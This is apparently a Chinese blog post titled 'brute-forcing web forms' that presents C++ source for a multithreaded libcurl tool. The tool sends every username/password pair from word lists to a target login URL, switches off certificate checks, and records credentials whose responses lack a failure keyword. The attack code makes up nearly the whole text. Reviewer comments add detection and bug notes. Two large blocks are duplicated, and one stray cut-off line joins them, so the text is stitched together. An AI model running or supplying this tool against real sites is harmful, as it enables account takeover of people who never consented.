暴力破解Web表单
图为我的思考方式:
// Driver body. The enclosing function header is not in view (presumably main()).
// Flow: set the console colour, initialise libcurl, load the username / password /
// extra-header files, build the full user x pass cross product, send one probe
// request whose raw response is dumped to a file, then push the pairs through
// pull_one_url in batches of thread_num threads.
// File-scope names read or written here but not declared in this span:
// userfilename, passwordfilename, headerfilename, vecheader1, m_postdata,
// keyword, url, szCount, sz_head, sz_html — TODO confirm their declarations.
// Defender's note: what the receiving side sees is a burst of POSTs to a single
// URL with a constant body template and the fixed User-Agent set in
// pull_one_url; per-source rate limiting and account lockout on the login
// endpoint are the standard mitigations, and that constant signature is the
// detection hook.
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
curl_global_init(CURL_GLOBAL_ALL); // must precede any curl_easy_* call; paired with curl_global_cleanup() at the end
SYSTEM_INFO info; // thread count is derived from the CPU count (dwNumberOfProcessors, used below)
GetSystemInfo(&info);
// Word lists are read as whitespace-separated tokens, so an entry containing a
// space is split into several entries. Binding the temporary ifstream to
// istream_iterator's istream& parameter appears to rely on a compiler
// extension (MSVC) — TODO confirm this builds on other toolchains.
vector< string> user(istream_iterator< string>(ifstream(userfilename.c_str())),istream_iterator< string>());
vector< string> pass(istream_iterator< string>(ifstream(passwordfilename.c_str())),istream_iterator< string>());
// Extra request headers, one per line, appended to the global vecheader1.
// NOTE(review): an eof()-controlled loop reads one line past the end and pushes
// an empty header; if the file failed to open, eofbit is never set and this
// loop does not terminate.
fstream filed(headerfilename);
while (!filed.eof())
{
char temp[4096]=""; // a line of 4096+ chars sets failbit on the stream
filed.getline(temp,4096);
vecheader1.push_back(temp);
}
filed.close();
// Populate the globals from their files: POST body template, failure keyword, target URL.
CWork::readpostdata(m_postdata);
CWork::readkeyword(keyword);
CWork::readurl(url);
// Materialise the whole cross product up front — memory grows with |user| * |pass|.
vector<UserPass> obj_userpass;
for(size_t i=0;i!=user.size();i++)
{
for(size_t j=0;j!=pass.size();j++)
{
UserPass temp;
temp.user=user[i];
temp.pass=pass[j];
obj_userpass.push_back(temp);
}
}
// Console title: presumably maketitle appends "<label><count>" for each call — verify.
string console_title;
CWork::maketitle(console_title,"帐号数量:",user.size());
CWork::maketitle(console_title,"密码数量:",pass.size());
CWork::maketitle(console_title,"共计次数:",obj_userpass.size());
wstring w_console_title=CWork::s2ws(console_title); // narrow -> wide for SetConsoleTitle (Unicode build assumed)
SetConsoleTitle(w_console_title.c_str());
user.clear(); // the word lists are no longer needed once the pairs exist
pass.clear();
//////////////////////// generate test data ////////////////////////
// One probe request with the first pair. pull_one_url publishes the raw
// response header and body in the globals sz_head / sz_html; both are appended
// to a file so the failure keyword can be chosen by reading the real response.
if(obj_userpass.size()>=1)
{
pull_one_url(obj_userpass[0]);
ofstream out("第一次数据测试.txt",ios::app);
out<<sz_head<<endl<<endl;
out<<"--------分割性-----------"<<endl;
out<<sz_html<<endl;
out.close();
}
//////////////////////// so that one can inspect what the keyword should be set to ////////////////////////
int thread_num=info.dwNumberOfProcessors*2; // concurrency: two threads per logical processor
long current_pos=1; // next pair to hand out; presumably advanced inside allocateUserPass — verify
long result=0; // number of requests dispatched so far (shown in the console title)
int num_total=obj_userpass.size(); // unused
console_title+="已发送:";
// Batch loop: take thread_num pairs, run one thread per pair, join, repeat.
while (1)
{
if (obj_userpass.size()<current_pos) // size_t vs long comparison; benign while current_pos stays positive
{
break;
}
vector<UserPass> obj;
CWork::allocateUserPass(obj,obj_userpass,current_pos,thread_num);
// Title becomes "<counts> 已发送:<sent>[ 已成功破解:<hits>]"; szCount is written by the worker threads.
stringstream strStream;
strStream<<result;
string new_tile=console_title;
new_tile+=strStream.str();
if (szCount!=0)
{
new_tile+=" 已成功破解:";
stringstream strStream1;
strStream1<<szCount;
new_tile+=strStream1.str();
}
wstring w_console_title=CWork::s2ws(new_tile);
SetConsoleTitle(w_console_title.c_str());
thread_group threads;
int obj_num=obj.size();
for ( int i = 0; i!=obj_num; ++ i) {
result++;
threads.create_thread(boost::bind(&pull_one_url,obj[i])); // obj[i] is copied into the thread (pull_one_url takes UserPass by value)
}
threads.join_all(); // the whole batch finishes before the next one is dispatched
}
cout<<"所有密码全部查找完成"<<endl;
curl_global_cleanup();
FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
// Driver body (second copy of the same listing; the statement preceding it is
// cut off). Flow: initialise libcurl, load the username / password /
// extra-header files, build the full user x pass cross product, send one probe
// request whose raw response is dumped to a file, then push the pairs through
// pull_one_url in batches of thread_num threads.
// File-scope names read or written here but not declared in this span:
// userfilename, passwordfilename, headerfilename, vecheader1, m_postdata,
// keyword, url, szCount, sz_head, sz_html — TODO confirm their declarations.
// Defender's note: what the receiving side sees is a burst of POSTs to a single
// URL with a constant body template and the fixed User-Agent set in
// pull_one_url; per-source rate limiting and account lockout on the login
// endpoint are the standard mitigations, and that constant signature is the
// detection hook.
curl_global_init(CURL_GLOBAL_ALL); // must precede any curl_easy_* call; paired with curl_global_cleanup() at the end
SYSTEM_INFO info; // thread count is derived from the CPU count (dwNumberOfProcessors, used below)
GetSystemInfo(&info);
// Word lists are read as whitespace-separated tokens, so an entry containing a
// space is split into several entries. Binding the temporary ifstream to
// istream_iterator's istream& parameter appears to rely on a compiler
// extension (MSVC) — TODO confirm this builds on other toolchains.
vector< string> user(istream_iterator< string>(ifstream(userfilename.c_str())),istream_iterator< string>());
vector< string> pass(istream_iterator< string>(ifstream(passwordfilename.c_str())),istream_iterator< string>());
// Extra request headers, one per line, appended to the global vecheader1.
// NOTE(review): an eof()-controlled loop reads one line past the end and pushes
// an empty header; if the file failed to open, eofbit is never set and this
// loop does not terminate.
fstream filed(headerfilename);
while (!filed.eof())
{
char temp[4096]=""; // a line of 4096+ chars sets failbit on the stream
filed.getline(temp,4096);
vecheader1.push_back(temp);
}
filed.close();
// Populate the globals from their files: POST body template, failure keyword, target URL.
CWork::readpostdata(m_postdata);
CWork::readkeyword(keyword);
CWork::readurl(url);
// Materialise the whole cross product up front — memory grows with |user| * |pass|.
vector<UserPass> obj_userpass;
for(size_t i=0;i!=user.size();i++)
{
for(size_t j=0;j!=pass.size();j++)
{
UserPass temp;
temp.user=user[i];
temp.pass=pass[j];
obj_userpass.push_back(temp);
}
}
// Console title: presumably maketitle appends "<label><count>" for each call — verify.
string console_title;
CWork::maketitle(console_title,"帐号数量:",user.size());
CWork::maketitle(console_title,"密码数量:",pass.size());
CWork::maketitle(console_title,"共计次数:",obj_userpass.size());
wstring w_console_title=CWork::s2ws(console_title); // narrow -> wide for SetConsoleTitle (Unicode build assumed)
SetConsoleTitle(w_console_title.c_str());
user.clear(); // the word lists are no longer needed once the pairs exist
pass.clear();
//////////////////////// generate test data ////////////////////////
// One probe request with the first pair. pull_one_url publishes the raw
// response header and body in the globals sz_head / sz_html; both are appended
// to a file so the failure keyword can be chosen by reading the real response.
if(obj_userpass.size()>=1)
{
pull_one_url(obj_userpass[0]);
ofstream out("第一次数据测试.txt",ios::app);
out<<sz_head<<endl<<endl;
out<<"--------分割性-----------"<<endl;
out<<sz_html<<endl;
out.close();
}
//////////////////////// so that one can inspect what the keyword should be set to ////////////////////////
int thread_num=info.dwNumberOfProcessors*2; // concurrency: two threads per logical processor
long current_pos=1; // next pair to hand out; presumably advanced inside allocateUserPass — verify
long result=0; // number of requests dispatched so far (shown in the console title)
int num_total=obj_userpass.size(); // unused
console_title+="已发送:";
// Batch loop: take thread_num pairs, run one thread per pair, join, repeat.
while (1)
{
if (obj_userpass.size()<current_pos) // size_t vs long comparison; benign while current_pos stays positive
{
break;
}
vector<UserPass> obj;
CWork::allocateUserPass(obj,obj_userpass,current_pos,thread_num);
// Title becomes "<counts> 已发送:<sent>[ 已成功破解:<hits>]"; szCount is written by the worker threads.
stringstream strStream;
strStream<<result;
string new_tile=console_title;
new_tile+=strStream.str();
if (szCount!=0)
{
new_tile+=" 已成功破解:";
stringstream strStream1;
strStream1<<szCount;
new_tile+=strStream1.str();
}
wstring w_console_title=CWork::s2ws(new_tile);
SetConsoleTitle(w_console_title.c_str());
thread_group threads;
int obj_num=obj.size();
for ( int i = 0; i!=obj_num; ++ i) {
result++;
threads.create_thread(boost::bind(&pull_one_url,obj[i])); // obj[i] is copied into the thread (pull_one_url takes UserPass by value)
}
threads.join_all(); // the whole batch finishes before the next one is dispatched
}
cout<<"所有密码全部查找完成"<<endl;
curl_global_cleanup();
/// Sends one login attempt for the given pair and classifies the response.
/// @param obj  credential pair, taken by value so each thread owns its copy.
/// Reads file-scope state: m_postdata (POST body template containing the
/// {0%} / {1%} placeholders), url, vecheader1 (extra headers), keyword
/// (lower-cased here, in place), io_mutex; writes szCount, sz_html, sz_head and
/// appends hits to the file named by the file-scope `result` — TODO confirm
/// those declarations, they are outside this span.
/// Classification: HTTP 200/302 whose lower-cased body does not contain
/// `keyword` is counted as a hit; 200/302 containing it is a miss; http_code 0
/// (no response) retries the same pair; any other code is logged as a miss.
/// Thread-safety: every thread of a batch runs this concurrently, and the
/// in-place transform of the shared `keyword`, the `szCount++` and the writes
/// to sz_html / sz_head all happen outside io_mutex.
void pull_one_url(UserPass obj)
{
bool m_true= true;
transform(keyword.begin(), keyword.end(), keyword.begin(), ::tolower); // lowercase the keyword to match the lowercased response below; mutates a global shared by every thread
while(m_true)
{
string dddddd=m_postdata; // fresh copy of the template for every attempt
if(dddddd.empty())
{
cout<<"postdata中数据为空,线程马上退出"<<endl;
return;
}
if (url.empty()||url=="") // the second test is redundant with empty()
{
cout<<"attackurl.txt不存在,或url地址为空"<<endl;
return;
}
CURL *curl = curl_easy_init(); // not null-checked
string m_url=url;
string header; // raw response headers, filled by header_write_data
string html; // response body, filled by html_write_data
struct curl_slist *slist_header = NULL;
for ( int i=0;i!=vecheader1.size();i++)
{
slist_header = curl_slist_append(slist_header,vecheader1[i].c_str());
}
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, slist_header); // NOTE(review): never released with curl_slist_free_all — one list leaks per attempt
// connect and request timeouts, in milliseconds
curl_easy_setopt(curl, CURLOPT_POST, 1);
// curl_easy_setopt(curl,CURLOPT_FOLLOWLOCATION,1);
curl_easy_setopt(curl,CURLOPT_TIMEOUT_MS,10000);
curl_easy_setopt(curl,CURLOPT_CONNECTTIMEOUT_MS,10000);
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1); // needed when libcurl runs on several threads
curl_easy_setopt(curl, CURLOPT_URL, url.c_str());
if(m_url.substr(0,5)=="https")
{
// Certificate and hostname verification are switched off: the tool accepts
// any certificate from any server, so everything it sends can be read by an
// on-path party and the responses it classifies can be forged.
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
}
curl_easy_setopt(curl, CURLOPT_DNS_CACHE_TIMEOUT, 10000);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, 6000); // seconds; set after CURLOPT_TIMEOUT_MS above, so this (6000 s) is presumably the value in effect — verify
// curl_easy_setopt(curl, CURLOPT_VERBOSE,1);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, html_write_data);
// Substitute the pair into the template placeholders.
CWork::replace(dddddd,"{0%}",obj.user.c_str());
CWork::replace(dddddd,"{1%}",obj.pass.c_str());
curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, dddddd.length()); // Content-Length:
curl_easy_setopt(curl,CURLOPT_POSTFIELDS,dddddd.c_str()); // the POST body; libcurl keeps the pointer, dddddd lives until the end of this iteration
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &html);
curl_easy_setopt(curl, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0"); // constant UA on every request: a stable fingerprint for the receiving side
curl_easy_setopt(curl, CURLOPT_HEADERFUNCTION, header_write_data);
curl_easy_setopt(curl, CURLOPT_WRITEHEADER, &header);
curl_easy_perform(curl); /* ignores error */
// curl_easy_getinfo(curl,CURLINFO_SIZE_DOWNLOAD,&html_num); // size of the returned html
long http_code=0;
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code); // stays 0 when no response was received
// curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &m_time); // total elapsed time
// curl_easy_getinfo(curl,CURLINFO_CONNECT_TIME, &connect_time); // connect time
// curl_easy_getinfo(curl,CURLINFO_NAMELOOKUP_TIME, &datatime); // dns lookup time
// curl_easy_getinfo(curl, CURLINFO_PRIMARY_IP, &IP); // ip address
// CURLINFO_PRETRANSFER_TIME: time from connection established until ready to transfer;
// CURLINFO_STARTTRANSFER_TIME: time from connection established until the transfer starts;
// ptime now2 = microsec_clock::universal_time() + hours(8);
// boost::posix_time::millisec_posix_time_system_config::time_duration_type time_elapse = now2 - now1;
transform(header.begin(), header.end(), header.begin(), ::tolower); // lowercase the headers for the "utf" test below
transform(html.begin(), html.end(), html.begin(), ::tolower); // lowercase the body so keyword matching is case-insensitive
// Transcode the body here: if the headers mention utf, convert utf8 to gb2312
if(header.find("utf")!=-1) // size_t compared with -1; equivalent to != string::npos
{
string gb2312html;
CWork::Utf8ToGb2312(html.c_str(),gb2312html);
html=gb2312html;
}
if (http_code==200||http_code==302)
{
if (html.find(keyword)==-1) // keyword absent => hit; an empty keyword is found at 0, so it never reaches this branch
{
szCount++; // NOTE(review): incremented before the lock is taken — racy across threads
boost::mutex::scoped_lock lock(io_mutex); // serialises console colour changes and output
ofstream out(result,ios::app); // `result` must be a file-scope name here (the driver's `result` is a local long) — TODO confirm
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_GREEN);
out<<"恭喜!!! 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
cout<<"http状态"<<http_code<<"密码破解成功1个 username:"<<obj.user<<" password:"<<obj.pass<<endl;
out.close();
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
}
else
{
boost::mutex::scoped_lock lock(io_mutex);
cout<<"密码错误"<<" 线程ID: "<<boost::this_thread::get_id()<<" http_code:"<<setw(3)<<http_code<<" 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
}
}
else
{
if(http_code==0)
{
// No HTTP response (timeout / connection failure): the same pair is tried
// again. NOTE(review): there is no retry limit, so an unreachable host keeps
// this thread — and, through join_all, its whole batch — looping here; the
// slist_header list is not freed on this path either.
boost::mutex::scoped_lock lock(io_mutex);
cout<<"超时马上重新连接"<<"用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
curl_easy_cleanup(curl);
continue;
}
boost::mutex::scoped_lock lock(io_mutex);
cout<<"密码错误"<<" 线程ID: "<<boost::this_thread::get_id()<<" http_code:"<<http_code<<" 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
}
m_true= false; // one attempt completed (hit or miss) — leave the loop
curl_easy_cleanup(curl);
sz_html=html; // published for the probe-request dump in the driver; written by every thread without a lock
sz_head=header;
}
}
// Body of pull_one_url, repeated here without its signature line (`obj` is the
// UserPass parameter). Reads file-scope state: m_postdata (POST body template
// with the {0%} / {1%} placeholders), url, vecheader1, keyword (lower-cased in
// place), io_mutex; writes szCount, sz_html, sz_head and appends hits to the
// file named by the file-scope `result` — TODO confirm those declarations.
// Classification: HTTP 200/302 whose lower-cased body lacks `keyword` is a hit;
// 200/302 containing it is a miss; http_code 0 retries the same pair; any
// other code is logged as a miss. The keyword transform, szCount++ and the
// sz_html / sz_head writes all happen outside io_mutex while several threads
// run this body concurrently.
{
bool m_true= true;
transform(keyword.begin(), keyword.end(), keyword.begin(), ::tolower); // lowercase the keyword to match the lowercased response below; mutates a global shared by every thread
while(m_true)
{
string dddddd=m_postdata; // fresh copy of the template for every attempt
if(dddddd.empty())
{
cout<<"postdata中数据为空,线程马上退出"<<endl;
return;
}
if (url.empty()||url=="") // the second test is redundant with empty()
{
cout<<"attackurl.txt不存在,或url地址为空"<<endl;
return;
}
CURL *curl = curl_easy_init(); // not null-checked
string m_url=url;
string header; // raw response headers, filled by header_write_data
string html; // response body, filled by html_write_data
struct curl_slist *slist_header = NULL;
for ( int i=0;i!=vecheader1.size();i++)
{
slist_header = curl_slist_append(slist_header,vecheader1[i].c_str());
}
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, slist_header); // NOTE(review): never released with curl_slist_free_all — one list leaks per attempt
// connect and request timeouts, in milliseconds
curl_easy_setopt(curl, CURLOPT_POST, 1);
// curl_easy_setopt(curl,CURLOPT_FOLLOWLOCATION,1);
curl_easy_setopt(curl,CURLOPT_TIMEOUT_MS,10000);
curl_easy_setopt(curl,CURLOPT_CONNECTTIMEOUT_MS,10000);
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1); // needed when libcurl runs on several threads
curl_easy_setopt(curl, CURLOPT_URL, url.c_str());
if(m_url.substr(0,5)=="https")
{
// Certificate and hostname verification are switched off: the tool accepts
// any certificate from any server, so everything it sends can be read by an
// on-path party and the responses it classifies can be forged.
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
}
curl_easy_setopt(curl, CURLOPT_DNS_CACHE_TIMEOUT, 10000);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, 6000); // seconds; set after CURLOPT_TIMEOUT_MS above, so this (6000 s) is presumably the value in effect — verify
// curl_easy_setopt(curl, CURLOPT_VERBOSE,1);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, html_write_data);
// Substitute the pair into the template placeholders.
CWork::replace(dddddd,"{0%}",obj.user.c_str());
CWork::replace(dddddd,"{1%}",obj.pass.c_str());
curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, dddddd.length()); // Content-Length:
curl_easy_setopt(curl,CURLOPT_POSTFIELDS,dddddd.c_str()); // the POST body; libcurl keeps the pointer, dddddd lives until the end of this iteration
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &html);
curl_easy_setopt(curl, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0"); // constant UA on every request: a stable fingerprint for the receiving side
curl_easy_setopt(curl, CURLOPT_HEADERFUNCTION, header_write_data);
curl_easy_setopt(curl, CURLOPT_WRITEHEADER, &header);
curl_easy_perform(curl); /* ignores error */
// curl_easy_getinfo(curl,CURLINFO_SIZE_DOWNLOAD,&html_num); // size of the returned html
long http_code=0;
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code); // stays 0 when no response was received
// curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &m_time); // total elapsed time
// curl_easy_getinfo(curl,CURLINFO_CONNECT_TIME, &connect_time); // connect time
// curl_easy_getinfo(curl,CURLINFO_NAMELOOKUP_TIME, &datatime); // dns lookup time
// curl_easy_getinfo(curl, CURLINFO_PRIMARY_IP, &IP); // ip address
// CURLINFO_PRETRANSFER_TIME: time from connection established until ready to transfer;
// CURLINFO_STARTTRANSFER_TIME: time from connection established until the transfer starts;
// ptime now2 = microsec_clock::universal_time() + hours(8);
// boost::posix_time::millisec_posix_time_system_config::time_duration_type time_elapse = now2 - now1;
transform(header.begin(), header.end(), header.begin(), ::tolower); // lowercase the headers for the "utf" test below
transform(html.begin(), html.end(), html.begin(), ::tolower); // lowercase the body so keyword matching is case-insensitive
// Transcode the body here: if the headers mention utf, convert utf8 to gb2312
if(header.find("utf")!=-1) // size_t compared with -1; equivalent to != string::npos
{
string gb2312html;
CWork::Utf8ToGb2312(html.c_str(),gb2312html);
html=gb2312html;
}
if (http_code==200||http_code==302)
{
if (html.find(keyword)==-1) // keyword absent => hit; an empty keyword is found at 0, so it never reaches this branch
{
szCount++; // NOTE(review): incremented before the lock is taken — racy across threads
boost::mutex::scoped_lock lock(io_mutex); // serialises console colour changes and output
ofstream out(result,ios::app); // `result` must be a file-scope name here (the driver's `result` is a local long) — TODO confirm
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_GREEN);
out<<"恭喜!!! 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
cout<<"http状态"<<http_code<<"密码破解成功1个 username:"<<obj.user<<" password:"<<obj.pass<<endl;
out.close();
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
}
else
{
boost::mutex::scoped_lock lock(io_mutex);
cout<<"密码错误"<<" 线程ID: "<<boost::this_thread::get_id()<<" http_code:"<<setw(3)<<http_code<<" 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
}
}
else
{
if(http_code==0)
{
// No HTTP response (timeout / connection failure): the same pair is tried
// again. NOTE(review): there is no retry limit, so an unreachable host keeps
// this thread — and, through join_all, its whole batch — looping here; the
// slist_header list is not freed on this path either.
boost::mutex::scoped_lock lock(io_mutex);
cout<<"超时马上重新连接"<<"用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
curl_easy_cleanup(curl);
continue;
}
boost::mutex::scoped_lock lock(io_mutex);
cout<<"密码错误"<<" 线程ID: "<<boost::this_thread::get_id()<<" http_code:"<<http_code<<" 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
}
m_true= false; // one attempt completed (hit or miss) — leave the loop
curl_easy_cleanup(curl);
sz_html=html; // published for the probe-request dump in the driver; written by every thread without a lock
sz_head=header;
}
}